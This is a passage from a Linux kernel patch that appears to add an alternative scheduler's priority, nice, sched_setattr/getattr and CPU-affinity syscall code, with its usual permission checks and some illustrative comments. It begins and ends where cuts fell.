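++ * With a single scheduling policy implementation there is no
++ * sched_class to switch between here (unlike mainline); recording the
++ * new priority is sufficient.
++ */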
++static void __setscheduler_prio(struct task_struct *p, int prio)
++{
++	p->prio = prio;
++}
++
++#ifdef CONFIG_RT_MUTEXES
++
++static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
++{
++	if (pi_task)
++		prio = min(prio, pi_task->prio);
++
++	return prio;
++}
++
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	struct task_struct *pi_task = rt_mutex_get_top_task(p);
++
++	return __rt_effective_prio(pi_task, prio);
++}
++
++/*
++ * rt_mutex_setprio - set the current priority of a task
++ * @p: task to boost
++ * @pi_task: donor task
++ *
++ * This function changes the 'effective' priority of a task. It does
++ * not touch ->normal_prio like __setscheduler().
++ *
++ * Used by the rt_mutex code to implement priority inheritance
++ * logic. Call site only calls if the priority of the task changed.
++ */
++void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
++{
++	int prio;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	/* XXX used to be waiter->prio, not waiter->task->prio */
++	prio = __rt_effective_prio(pi_task, p->normal_prio);
++
++	/*
++	 * If nothing changed; bail early.
++	 */
++	if (p->pi_top_task == pi_task && prio == p->prio)
++		return;
++
++	rq = __task_access_lock(p, &lock);
++	update_rq_clock(rq);
++	/*
++	 * Set under pi_lock && rq->lock, such that the value can be used under
++	 * either lock.
++	 *
++	 * Note that a lot of trickiness is needed to make this pointer cache work
++	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
++	 * ensure a task is de-boosted (pi_task is set to NULL) before the
++	 * task is allowed to run again (and can exit). This ensures the pointer
++	 * points to a blocked task -- which guarantees the task is present.
++	 */
++	p->pi_top_task = pi_task;
++
++	/*
++	 * For FIFO/RR we only need to set prio, if that matches we're done.
++	 */
++	if (prio == p->prio)
++		goto out_unlock;
++
++	/*
++	 * Idle task boosting is a no-no in general. There is one
++	 * exception, when PREEMPT_RT and NOHZ is active:
++	 *
++	 * The idle task calls get_next_timer_interrupt() and holds
++	 * the timer wheel base->lock on the CPU and another CPU wants
++	 * to access the timer (probably to cancel it). We can safely
++	 * ignore the boosting request, as the idle CPU runs this code
++	 * with interrupts disabled and will complete the lock
++	 * protected section without being interrupted. So there is no
++	 * real need to boost.
++	 */
++	if (unlikely(p == rq->idle)) {
++		WARN_ON(p != rq->curr);
++		WARN_ON(p->pi_blocked_on);
++		goto out_unlock;
++	}
++
++	trace_sched_pi_setprio(p, pi_task);
++
++	__setscheduler_prio(p, prio);
++
++	check_task_changed(p, rq);
++out_unlock:
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++
++	__balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++
++	preempt_enable();
++}
++#else
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	return prio;
++}
++#endif
++
++void set_user_nice(struct task_struct *p, long nice)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
++		return;
++	/*
++	 * We have to be careful, if called from sys_setpriority(),
++	 * the task might be in the middle of scheduling on another CPU.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	rq = __task_access_lock(p, &lock);
++
++	p->static_prio = NICE_TO_PRIO(nice);
++	/*
++	 * The RT priorities are set via sched_setscheduler(), but we still
++	 * allow the 'normal' nice value to be set - but as expected
++	 * it won't have any effect on scheduling until the task
++	 * becomes SCHED_NORMAL/SCHED_BATCH:
++	 */
++	if (task_has_rt_policy(p))
++		goto out_unlock;
++
++	p->prio = effective_prio(p);
++
++	check_task_changed(p, rq);
++out_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++EXPORT_SYMBOL(set_user_nice);
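++
++/*
++ * Illustrative in-kernel use, not part of this patch ("tsk" is a
++ * placeholder task pointer):
++ *
++ *	set_user_nice(tsk, 10);
++ *
++ * This only affects scheduling once the task runs under
++ * SCHED_NORMAL/SCHED_BATCH.
++ */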
++
++/*
++ * is_nice_reduction - check if nice value is an actual reduction
++ *
++ * Similar to can_nice() but does not perform a capability check.
++ *
++ * @p: task
++ * @nice: nice value
++ */
++static bool is_nice_reduction(const struct task_struct *p, const int nice)
++{
++	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
++	int nice_rlim = nice_to_rlimit(nice);
++
++	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
++}
++
++/*
++ * can_nice - check if a task can reduce its nice value
++ * @p: task
++ * @nice: nice value
++ */
++int can_nice(const struct task_struct *p, const int nice)
++{
++	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
++}
++
++#ifdef __ARCH_WANT_SYS_NICE
++
++/*
++ * sys_nice - change the priority of the current process.
++ * @increment: priority increment
++ *
++ * sys_setpriority is a more generic, but much slower function that
++ * does similar things.
++ */
++SYSCALL_DEFINE1(nice, int, increment)
++{
++	long nice, retval;
++
++	/*
++	 * Setpriority might change our priority at the same moment.
++	 * We don't have to worry. Conceptually one call occurs first
++	 * and we have a single winner.
++	 */
++
++	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
++	nice = task_nice(current) + increment;
++
++	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
++	if (increment < 0 && !can_nice(current, nice))
++		return -EPERM;
++
++	retval = security_task_setnice(current, nice);
++	if (retval)
++		return retval;
++
++	set_user_nice(current, nice);
++	return 0;
++}
++
++#endif
++
++/**
++ * task_prio - return the priority value of a given task.
++ * @p: the task in question.
++ *
++ * Return: The priority value as seen by users in /proc.
++ *
++ * sched policy                return value   kernel prio   user prio/nice
++ *
++ * (BMQ) normal, batch, idle     [0 ... 53]  [100 ... 139]  0/[-20 ... 19]/[-7 ... 7]
++ * (PDS) normal, batch, idle     [0 ... 39]            100  0/[-20 ... 19]
++ * fifo, rr                   [-1 ... -100]     [99 ... 0]  [0 ... 99]
++ */
++int task_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
++		task_sched_prio_normal(p, task_rq(p));
++}
++
++/**
++ * idle_cpu - is a given CPU idle currently?
++ * @cpu: the processor in question.
++ *
++ * Return: 1 if the CPU is currently idle. 0 otherwise.
++ */
++int idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (rq->curr != rq->idle)
++		return 0;
++
++	if (rq->nr_running)
++		return 0;
++
++#ifdef CONFIG_SMP
++	if (rq->ttwu_pending)
++		return 0;
++#endif
++
++	return 1;
++}
++
++/**
++ * idle_task - return the idle task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * Return: The idle task for the cpu @cpu.
++ */
++struct task_struct *idle_task(int cpu)
++{
++	return cpu_rq(cpu)->idle;
++}
++
++/**
++ * find_process_by_pid - find a process with a matching PID value.
++ * @pid: the pid in question.
++ *
++ * The task of @pid, if found. %NULL otherwise.
++ */
++static inline struct task_struct *find_process_by_pid(pid_t pid)
++{
++	return pid ? find_task_by_vpid(pid) : current;
++}
++
++/*
++ * sched_setparam() passes in -1 for its policy, to let the functions
++ * it calls know not to change it.
++ */
++#define SETPARAM_POLICY -1
++
++static void __setscheduler_params(struct task_struct *p,
++		const struct sched_attr *attr)
++{
++	int policy = attr->sched_policy;
++
++	if (policy == SETPARAM_POLICY)
++		policy = p->policy;
++
++	p->policy = policy;
++
++	/*
++	 * Allow the normal nice value to be set, but it will have no
++	 * effect on scheduling until the task becomes SCHED_NORMAL/
++	 * SCHED_BATCH
++	 */
++	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
++
++	/*
++	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
++	 * !rt_policy. Always setting this ensures that things like
++	 * getparam()/getattr() don't report silly values for !rt tasks.
++	 */
++	p->rt_priority = attr->sched_priority;
++	p->normal_prio = normal_prio(p);
++}
++
++/*
++ * check the target process has a UID that matches the current process's
++ */
++static bool check_same_owner(struct task_struct *p)
++{
++	const struct cred *cred = current_cred(), *pcred;
++	bool match;
++
++	rcu_read_lock();
++	pcred = __task_cred(p);
++	match = (uid_eq(cred->euid, pcred->euid) ||
++		 uid_eq(cred->euid, pcred->uid));
++	rcu_read_unlock();
++	return match;
++}
++
++/*
++ * Allow unprivileged RT tasks to decrease priority.
++ * Only issue a capable test if needed and only once to avoid an audit
++ * event on permitted non-privileged operations:
++ */
++static int user_check_sched_setscheduler(struct task_struct *p,
++					 const struct sched_attr *attr,
++					 int policy, int reset_on_fork)
++{
++	if (rt_policy(policy)) {
++		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
++
++		/* Can't set/change the rt policy: */
++		if (policy != p->policy && !rlim_rtprio)
++			goto req_priv;
++
++		/* Can't increase priority: */
++		if (attr->sched_priority > p->rt_priority &&
++		    attr->sched_priority > rlim_rtprio)
++			goto req_priv;
++	}
++
++	/* Can't change other user's priorities: */
++	if (!check_same_owner(p))
++		goto req_priv;
++
++	/* Normal users shall not reset the sched_reset_on_fork flag: */
++	if (p->sched_reset_on_fork && !reset_on_fork)
++		goto req_priv;
++
++	return 0;
++
++req_priv:
++	if (!capable(CAP_SYS_NICE))
++		return -EPERM;
++
++	return 0;
++}
++
++static int __sched_setscheduler(struct task_struct *p,
++				const struct sched_attr *attr,
++				bool user, bool pi)
++{
++	const struct sched_attr dl_squash_attr = {
++		.size		= sizeof(struct sched_attr),
++		.sched_policy	= SCHED_FIFO,
++		.sched_nice	= 0,
++		.sched_priority = 99,
++	};
++	int oldpolicy = -1, policy = attr->sched_policy;
++	int retval, newprio;
++	struct balance_callback *head;
++	unsigned long flags;
++	struct rq *rq;
++	int reset_on_fork;
++	raw_spinlock_t *lock;
++
++	/* The pi code expects interrupts enabled */
++	BUG_ON(pi && in_interrupt());
++
++	/*
++	 * Alt schedule FW supports SCHED_DEADLINE by squashing it into prio 0 SCHED_FIFO
++	 */
++	if (unlikely(SCHED_DEADLINE == policy)) {
++		attr = &dl_squash_attr;
++		policy = attr->sched_policy;
++	}
++recheck:
++	/* Double check policy once rq lock held */
++	if (policy < 0) {
++		reset_on_fork = p->sched_reset_on_fork;
++		policy = oldpolicy = p->policy;
++	} else {
++		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
++
++		if (policy > SCHED_IDLE)
++			return -EINVAL;
++	}
++
++	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
++		return -EINVAL;
++
++	/*
++	 * Valid priorities for SCHED_FIFO and SCHED_RR are
++	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
++	 * SCHED_BATCH and SCHED_IDLE is 0.
++	 */
++	if (attr->sched_priority < 0 ||
++	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
++	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
++		return -EINVAL;
++	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
++	    (attr->sched_priority != 0))
++		return -EINVAL;
++
++	if (user) {
++		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
++		if (retval)
++			return retval;
++
++		retval = security_task_setscheduler(p);
++		if (retval)
++			return retval;
++	}
++
++	if (pi)
++		cpuset_read_lock();
++
++	/*
++	 * Make sure no PI-waiters arrive (or leave) while we are
++	 * changing the priority of the task:
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++
++	/*
++	 * To be able to change p->policy safely, task_access_lock()
++	 * must be called.
++	 * If task_access_lock() is used here:
++	 * For a task p which is not running, reading rq->stop is
++	 * racy but acceptable, as ->stop doesn't change much.
++	 * An enhancement could be made to read rq->stop safely.
++	 */
++	rq = __task_access_lock(p, &lock);
++
++	/*
++	 * Changing the policy of the stop threads is a very bad idea
++	 */
++	if (p == rq->stop) {
++		retval = -EINVAL;
++		goto unlock;
++	}
++
++	/*
++	 * If not changing anything there's no need to proceed further:
++	 */
++	if (unlikely(policy == p->policy)) {
++		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
++			goto change;
++		if (!rt_policy(policy) &&
++		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
++			goto change;
++
++		p->sched_reset_on_fork = reset_on_fork;
++		retval = 0;
++		goto unlock;
++	}
++change:
++
++	/* Re-check policy now with rq lock held */
++	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
++		policy = oldpolicy = -1;
++		__task_access_unlock(p, lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++		if (pi)
++			cpuset_read_unlock();
++		goto recheck;
++	}
++
++	p->sched_reset_on_fork = reset_on_fork;
++
++	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
++	if (pi) {
++		/*
++		 * Take priority boosted tasks into account. If the new
++		 * effective priority is unchanged, we just store the new
++		 * normal parameters and do not touch the scheduler class and
++		 * the runqueue. This will be done when the task deboosts
++		 * itself.
++		 */
++		newprio = rt_effective_prio(p, newprio);
++	}
++
++	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
++		__setscheduler_params(p, attr);
++		__setscheduler_prio(p, newprio);
++	}
++
++	check_task_changed(p, rq);
++
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++	head = splice_balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	if (pi) {
++		cpuset_read_unlock();
++		rt_mutex_adjust_pi(p);
++	}
++
++	/* Run balance callbacks after we've adjusted the PI chain: */
++	balance_callbacks(rq, head);
++	preempt_enable();
++
++	return 0;
++
++unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++	if (pi)
++		cpuset_read_unlock();
++	return retval;
++}
++
++static int _sched_setscheduler(struct task_struct *p, int policy,
++			       const struct sched_param *param, bool check)
++{
++	struct sched_attr attr = {
++		.sched_policy   = policy,
++		.sched_priority = param->sched_priority,
++		.sched_nice     = PRIO_TO_NICE(p->static_prio),
++	};
++
++	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
++	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
++		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++		policy &= ~SCHED_RESET_ON_FORK;
++		attr.sched_policy = policy;
++	}
++
++	return __sched_setscheduler(p, &attr, check, true);
++}
++
++/**
++ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Use sched_set_fifo(), read its comment.
++ *
++ * Return: 0 on success. An error code otherwise.
++ *
++ * NOTE that the task may be already dead.
++ */
++int sched_setscheduler(struct task_struct *p, int policy,
++		       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, true);
++}
++
++int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, true, true);
++}
++
++int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, false, true);
++}
++EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
++
++/**
++ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Just like sched_setscheduler, only don't bother checking if the
++ * current context has permission.  For example, this is needed in
++ * stop_machine(): we create temporary high priority worker threads,
++ * but our caller might not have that capability.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++int sched_setscheduler_nocheck(struct task_struct *p, int policy,
++			       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, false);
++}
++
++/*
++ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
++ * incapable of resource management, which is the one thing an OS really should
++ * be doing.
++ *
++ * This is of course the reason it is limited to privileged users only.
++ *
++ * Worse still; it is fundamentally impossible to compose static priority
++ * workloads. You cannot take two correctly working static prio workloads
++ * and smash them together and still expect them to work.
++ *
++ * For this reason 'all' FIFO tasks the kernel creates are basically at:
++ *
++ *   MAX_RT_PRIO / 2
++ *
++ * The administrator _MUST_ configure the system, the kernel simply doesn't
++ * know enough information to make a sensible choice.
++ */
++void sched_set_fifo(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo);
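++
++/*
++ * Illustrative caller, not part of this patch ("fn" and "data" are
++ * placeholders):
++ *
++ *	struct task_struct *t = kthread_create(fn, data, "example");
++ *	if (!IS_ERR(t)) {
++ *		sched_set_fifo(t);
++ *		wake_up_process(t);
++ *	}
++ */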
++
++/*
++ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
++ */
++void sched_set_fifo_low(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = 1 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo_low);
++
++void sched_set_normal(struct task_struct *p, int nice)
++{
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++		.sched_nice = nice,
++	};
++	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_normal);
++
++static int
++do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
++{
++	struct sched_param lparam;
++	struct task_struct *p;
++	int retval;
++
++	if (!param || pid < 0)
++		return -EINVAL;
++	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
++		return -EFAULT;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setscheduler(p, policy, &lparam);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/*
++ * Mimics kernel/events/core.c perf_copy_attr().
++ */
++static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
++{
++	u32 size;
++	int ret;
++
++	/* Zero the full structure, so that a short copy will be nice: */
++	memset(attr, 0, sizeof(*attr));
++
++	ret = get_user(size, &uattr->size);
++	if (ret)
++		return ret;
++
++	/* ABI compatibility quirk: */
++	if (!size)
++		size = SCHED_ATTR_SIZE_VER0;
++
++	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
++		goto err_size;
++
++	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
++	if (ret) {
++		if (ret == -E2BIG)
++			goto err_size;
++		return ret;
++	}
++
++	/*
++	 * XXX: Do we want to be lenient like existing syscalls; or do we want
++	 * to be strict and return an error on out-of-bounds values?
++	 */
++	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
++
++	/* sched/core.c uses zero here but we already know ret is zero */
++	return 0;
++
++err_size:
++	put_user(sizeof(*attr), &uattr->size);
++	return -E2BIG;
++}
++
++/**
++ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
++ * @pid: the pid in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
++{
++	if (policy < 0)
++		return -EINVAL;
++
++	return do_sched_setscheduler(pid, policy, param);
++}
++
++/**
++ * sys_sched_setparam - set/change the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
++{
++	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
++}
++
++/**
++ * sys_sched_setattr - same as above, but with extended sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
++			       unsigned int, flags)
++{
++	struct sched_attr attr;
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || flags)
++		return -EINVAL;
++
++	retval = sched_copy_attr(uattr, &attr);
++	if (retval)
++		return retval;
++
++	if ((int)attr.sched_policy < 0)
++		return -EINVAL;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setattr(p, &attr);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
++ * @pid: the pid in question.
++ *
++ * Return: On success, the policy of the thread. Otherwise, a negative error
++ * code.
++ */
++SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
++{
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (pid < 0)
++		goto out_nounlock;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (p) {
++		retval = security_task_getscheduler(p);
++		if (!retval)
++			retval = p->policy;
++	}
++	rcu_read_unlock();
++
++out_nounlock:
++	return retval;
++}
++
++/**
++ * sys_sched_getparam - get the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the RT priority.
++ *
++ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
++ * code.
++ */
++SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
++{
++	struct sched_param lp = { .sched_priority = 0 };
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (!param || pid < 0)
++		goto out_nounlock;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	if (task_has_rt_policy(p))
++		lp.sched_priority = p->rt_priority;
++	rcu_read_unlock();
++
++	/*
++	 * This one might sleep, we cannot do it with a spinlock held ...
++	 */
++	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
++
++out_nounlock:
++	return retval;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/*
++ * Copy the kernel size attribute structure (which might be larger
++ * than what user-space knows about) to user-space.
++ *
++ * Note that all cases are valid: user-space buffer can be larger or
++ * smaller than the kernel-space buffer. The usual case is that both
++ * have the same size.
++ */
++static int
++sched_attr_copy_to_user(struct sched_attr __user *uattr,
++			struct sched_attr *kattr,
++			unsigned int usize)
++{
++	unsigned int ksize = sizeof(*kattr);
++
++	if (!access_ok(uattr, usize))
++		return -EFAULT;
++
++	/*
++	 * sched_getattr() ABI forwards and backwards compatibility:
++	 *
++	 * If usize == ksize then we just copy everything to user-space and all is good.
++	 *
++	 * If usize < ksize then we only copy as much as user-space has space for,
++	 * this keeps ABI compatibility as well. We skip the rest.
++	 *
++	 * If usize > ksize then user-space is using a newer version of the ABI,
++	 * which part the kernel doesn't know about. Just ignore it - tooling can
++	 * detect the kernel's knowledge of attributes from the attr->size value
++	 * which is set to ksize in this case.
++	 */
++	kattr->size = min(usize, ksize);
++
++	if (copy_to_user(uattr, kattr, kattr->size))
++		return -EFAULT;
++
++	return 0;
++}
++
++/**
++ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @usize: sizeof(attr) for fwd/bwd comp.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
++		unsigned int, usize, unsigned int, flags)
++{
++	struct sched_attr kattr = { };
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
++	    usize < SCHED_ATTR_SIZE_VER0 || flags)
++		return -EINVAL;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	kattr.sched_policy = p->policy;
++	if (p->sched_reset_on_fork)
++		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++	if (task_has_rt_policy(p))
++		kattr.sched_priority = p->rt_priority;
++	else
++		kattr.sched_nice = task_nice(p);
++	kattr.sched_flags &= SCHED_FLAG_ALL;
++
++#ifdef CONFIG_UCLAMP_TASK
++	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
++	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
++#endif
++
++	rcu_read_unlock();
++
++	return sched_attr_copy_to_user(uattr, &kattr, usize);
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++#ifdef CONFIG_SMP
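++/*
++ * SCHED_DEADLINE is squashed into SCHED_FIFO here (see
++ * __sched_setscheduler()), so there is no deadline bandwidth to
++ * validate against the affinity mask; accept unconditionally.
++ */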
++int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
++{
++	return 0;
++}
++#endif
++
++static int
++__sched_setaffinity(struct task_struct *p, struct affinity_context *ctx)
++{
++	int retval;
++	cpumask_var_t cpus_allowed, new_mask;
++
++	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
++		return -ENOMEM;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
++		retval = -ENOMEM;
++		goto out_free_cpus_allowed;
++	}
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	cpumask_and(new_mask, ctx->new_mask, cpus_allowed);
++
++	ctx->new_mask = new_mask;
++	ctx->flags |= SCA_CHECK;
++
++	retval = __set_cpus_allowed_ptr(p, ctx);
++	if (retval)
++		goto out_free_new_mask;
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	if (!cpumask_subset(new_mask, cpus_allowed)) {
++		/*
++		 * We must have raced with a concurrent cpuset
++		 * update. Just reset the cpus_allowed to the
++		 * cpuset's cpus_allowed
++		 */
++		cpumask_copy(new_mask, cpus_allowed);
++
++		/*
++		 * If SCA_USER is set, a 2nd call to __set_cpus_allowed_ptr()
++		 * will restore the previous user_cpus_ptr value.
++		 *
++		 * In the unlikely event a previous user_cpus_ptr exists,
++		 * we need to further restrict the mask to what is allowed
++		 * by that old user_cpus_ptr.
++		 */
++		if (unlikely((ctx->flags & SCA_USER) && ctx->user_mask)) {
++			bool empty = !cpumask_and(new_mask, new_mask,
++						  ctx->user_mask);
++
++			if (WARN_ON_ONCE(empty))
++				cpumask_copy(new_mask, cpus_allowed);
++		}
++		__set_cpus_allowed_ptr(p, ctx);
++		retval = -EINVAL;
++	}
++
++out_free_new_mask:
++	free_cpumask_var(new_mask);
++out_free_cpus_allowed:
++	free_cpumask_var(cpus_allowed);
++	return retval;
++}
++
++long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
++{
++	struct affinity_context ac;
++	struct cpumask *user_mask;
++	struct task_struct *p;
++	int retval;
++
++	rcu_read_lock();
++
++	p = find_process_by_pid(pid);
++	if (!p) {
++		rcu_read_unlock();
++		return -ESRCH;
++	}
++
++	/* Prevent p going away */
++	get_task_struct(p);
++	rcu_read_unlock();
++
++	if (p->flags & PF_NO_SETAFFINITY) {
++		retval = -EINVAL;
++		goto out_put_task;
++	}
++
++	if (!check_same_owner(p)) {
++		rcu_read_lock();
++		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
++			rcu_read_unlock();
++			retval = -EPERM;
++			goto out_put_task;
++		}
++		rcu_read_unlock();
++	}
++
++	retval = security_task_setscheduler(p);
++	if (retval)
++		goto out_put_task;
++
++	/*
++	 * With non-SMP configs, user_cpus_ptr/user_mask isn't used and
++	 * alloc_user_cpus_ptr() returns NULL.
++	 */
++	user_mask = alloc_user_cpus_ptr(NUMA_NO_NODE);
++	if (user_mask) {
++		cpumask_copy(user_mask, in_mask);
++	} else if (IS_ENABLED(CONFIG_SMP)) {
++		retval = -ENOMEM;
++		goto out_put_task;
++	}
++
++	ac = (struct affinity_context){
++		.new_mask  = in_mask,
++		.user_mask = user_mask,
++		.flags     = SCA_USER,
++	};
++
++	retval = __sched_setaffinity(p, &ac);
++	kfree(ac.user_mask);
++
++out_put_task:
++	put_task_struct(p);
++	return retval;
++}
++
++static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
++			     struct cpumask *new_mask)
++{
++	if (len < cpumask_size())
++		cpumask_clear(new_mask);
++	else if (len > cpumask_size())
++		len = cpumask_size();
++
++	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
++}
++
++/**
++ * sys_sched_setaffinity - set the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to the new CPU mask
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	cpumask_var_t new_mask;
++	int retval;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
++	if (retval == 0)
++		retval = sched_setaffinity(pid, new_mask);
++	free_cpumask_var(new_mask);
++	return retval;
++}
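++
++/*
++ * Illustrative user-space sketch: pinning the calling thread to CPU 0
++ * through the glibc wrapper, which passes a cpu_set_t down to this
++ * syscall:
++ *
++ *	cpu_set_t set;
++ *
++ *	CPU_ZERO(&set);
++ *	CPU_SET(0, &set);
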